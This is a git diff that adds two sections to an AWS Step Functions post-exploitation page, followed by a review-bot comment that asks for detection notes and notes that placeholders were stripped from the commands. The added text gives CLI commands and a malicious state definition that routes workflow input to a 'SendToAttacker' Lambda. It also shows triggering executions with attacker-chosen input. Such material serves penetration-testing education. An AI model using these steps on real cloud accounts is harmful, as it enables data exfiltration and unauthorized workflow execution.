diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md index 6a0cd5ba9..8bbb6aa52 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md 
@@ -71,6 +71,69 @@ aws stepfunctions untag-resource --resource-arn --tag-keys **Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. +### `states:UpdateStateMachine` + +This permission allows an attacker to **modify the logic of an existing state machine**. By injecting malicious logic into the state definition, the attacker could: + +- Add a **new state** that exfiltrates input/output to an external system (via Lambda or SNS). +- **Bypass security checks**, skip validation steps, or disable error handling. +- **Insert a logic bomb** that triggers under specific input conditions to disrupt execution. + +This attack can be subtle, blending into large state definitions, and may go unnoticed without strict ASL version control. + +```bash +aws stepfunctions update-state-machine \ + --state-machine-arn \ + --definition file://malicious_state_definition.json \ + --role-arn arn:aws:iam:::role/ +``` + +`malicious_state_definition.json` + +```json +{ + "Comment": "Malicious State Machine - Data Exfiltration", + "StartAt": "ExfiltrateSecrets", + "States": { + "ExfiltrateSecrets": { + "Type": "Task", + "Resource": "arn:aws:lambda:us-east-1:123456789012:function:SendToAttacker", + "InputPath": "$", + "ResultPath": "$.exfiltration_result", + "Next": "LegitimateStep" + }, + "LegitimateStep": { + "Type": "Task", + "Resource": "arn:aws:lambda:us-east-1:123456789012:function:LegitBusinessLogic", + "End": true + } + } +} +``` +- **Potential Impact**: Data exfiltration, disruption of logic flow, persistent access through hidden states. + +--- + +### `states:StartExecution` + +With this permission, an attacker can **trigger executions on demand**, passing arbitrary input to state machines. This allows: + +- **Triggering sensitive operations** (e.g., Lambda invocations, EC2 actions) if the workflow handles them. +- **Supplying attacker-controlled input** to abuse poorly validated states. 
+- **Recon of business logic** by probing execution responses or failures. + +Used with `states:GetExecutionHistory`, it becomes a powerful tool for **logic discovery**, **abuse**, or **command execution** through embedded Lambdas or activities. + +```bash +aws stepfunctions start-execution \ + --state-machine-arn \ + --name "backdoor-$(date +%s)" \ + --input '{"command":"whoami"}' +``` + +- **Potential Impact**: Unauthorized triggering of sensitive workflows, business logic abuse, stealthy persistence (can be cron-triggered via EventBridge). + + {{#include ../../../banners/hacktricks-training.md}}
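Review bot: the `states:UpdateStateMachine` text says a modified definition "may go unnoticed without strict ASL version control", but neither new section gives the reader the defensive counterpart; suggest a short line after each **Potential Impact** bullet naming where the change is visible (the state machine's definition and version history for `UpdateStateMachine`, the execution records that `StartExecution` creates, which the section itself pairs with `states:GetExecutionHistory`) so the page doubles as detection guidance. Also, the placeholders in the CLI examples have been stripped: `--state-machine-arn` has no value in both commands and `--role-arn arn:aws:iam:::role/` has an empty account ID and role name, matching the already-broken `--resource-arn --tag-keys` line above; wrapping placeholders as `<state-machine-arn>` / `<account-id>` / `<role-name>` would keep them from being eaten by rendering. Minor style point: the `- **Potential Impact**` bullet directly after the JSON fence lacks the blank line the `StartExecution` section uses, so the two sections render differently.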